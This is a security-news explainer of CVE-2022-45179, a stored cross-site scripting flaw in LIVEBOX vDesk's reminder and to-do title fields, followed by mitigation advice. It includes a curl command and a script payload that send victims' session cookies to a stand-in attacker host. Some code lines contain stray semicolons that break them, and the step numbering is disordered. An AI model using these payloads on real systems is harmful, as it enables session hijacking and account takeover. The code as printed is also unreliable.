CVE CyberSecurity Database News

CVE-2022-45179 - How Stored XSS in LIVEBOX vDesk Exposed Users to Credential Theft

Poster -

In late 2022, a security issue was reported in LIVEBOX Collaboration vDesk up to version v031. The problem is tracked as CVE-2022-45179 and, while it might seem simple, it could give attackers a major opening to trick users and steal credentials—right from inside a company's collaboration tool.

This post will break down what happened, show you how the vulnerability works with real example code, and walk you through the exact steps an attacker can use to exploit this bug. All in plain, clear English.

What is LIVEBOX Collaboration vDesk?

LIVEBOX vDesk is a popular online platform brands use for teamwork—project management, messaging, reminders and more. It's supposed to help collaboration, not expose teams to hackers.

What’s the CVE All About?

CVE-2022-45179 is a Stored Cross-Site Scripting (Stored XSS) issue. It affects these endpoints:

- /api/v1/vdeskintegration/todo/createorupdate (API that lets you create or update to-do list items)
- /dashboard/reminders (Dashboard widget where reminders are displayed)

The core of the problem? The title parameter for reminders and to-do items does not sanitize user input. This means attackers can put in *anything*—including <script> tags—and have it stored and displayed when anyone (including admins) later visits their dashboard.

Why Is This Vulnerable?

When web applications don't clean up (sanitize) input, all a bad actor needs to do is submit something like:

<script>alert('You have been hacked!');</script>

If the app displays this without filtering special characters, your browser will run that code. That’s XSS.

Here's How an Attacker Exploits the Bug

Let’s walk through a realistic exploit scenario in just a handful of steps.

a) Using a cURL command (for /api/v1/vdeskintegration/todo/createorupdate)

curl -k -X POST "https://YOUR_DOMAIN/api/v1/vdeskintegration/todo/createorupdate"; \
     -H "Authorization: Bearer [YOUR-TOKEN-HERE]" \
     -H "Content-Type: application/json" \
     -d '{
           "title": "<script>fetch(\"https://evil.example.com/?cookie=\"+document.cookie)</script>",
           "description": "Reminder for team",
           "dueDate": "2024-06-24"
         }'

> NOTE: [YOUR-TOKEN-HERE] is the attacker’s authentication token.

b) Via the Dashboard (/dashboard/reminders)

If there’s a web form for reminders, the attacker pastes the same JavaScript into the title field.

4. Credentials or Sessions are Stolen

The attacker can do a lot more than just pop up an alert. Here’s a harmful payload that sends the user's session cookie (often the only thing needed to hijack the user’s account):

<script>
  fetch('https://evil.example.com/steal?cookie='; + encodeURIComponent(document.cookie));
</script>

That’s it—if an admin views that reminder, their private session would be sent to the attacker’s website, likely giving total control of the admin’s vDesk account.

Phishing: Stealing passwords or session tokens for user and admin accounts.

- Drive-by Malicious Actions: Injecting hidden forms, password stealers, cryptominers, and other malware inside your dashboard.
- Company-wide Exposure: Once an attacker gets an admin’s tokens, they can escalate privileges or pivot deeper into company infrastructure.
- Loss of Trust: Employees lose faith in the platform; regulators may require a full incident disclosure.


## How to Fix / Mitigate

- Patch Immediately: If you’re running an affected version, upgrade to the latest one where input filtering is fixed.
- Sanitize User Input: All user-provided fields (like title) must strip dangerous HTML, or better, escape it on output.
- Use Content Security Policy (CSP): Helps provide another layer to prevent inline script execution.
- Review Logs: Look for strange or unexpected entries in reminders/todos for signs of tampering.

References

- NVD advisory: CVE-2022-45179
- OWASP: Cross-Site Scripting (XSS)
- LIVEBOX vDesk Product Page

Even basic input fields such as a "title" can become a launching pad for attackers.

- Stored XSS is serious: It waits for *future* victims and often targets users with elevated privileges (like admins).

Always sanitize user input and stay patched.

If you use LIVEBOX vDesk, check your version and remind your IT team: don’t ignore “boring” bugs—they often turn into the biggest breaches.


*Is your workplace at risk? Talk to your IT team now or share this post to protect your colleagues.*

Timeline

Published on: 02/21/2024 16:15:49 UTC
Last modified on: 03/19/2024 16:49:07 UTC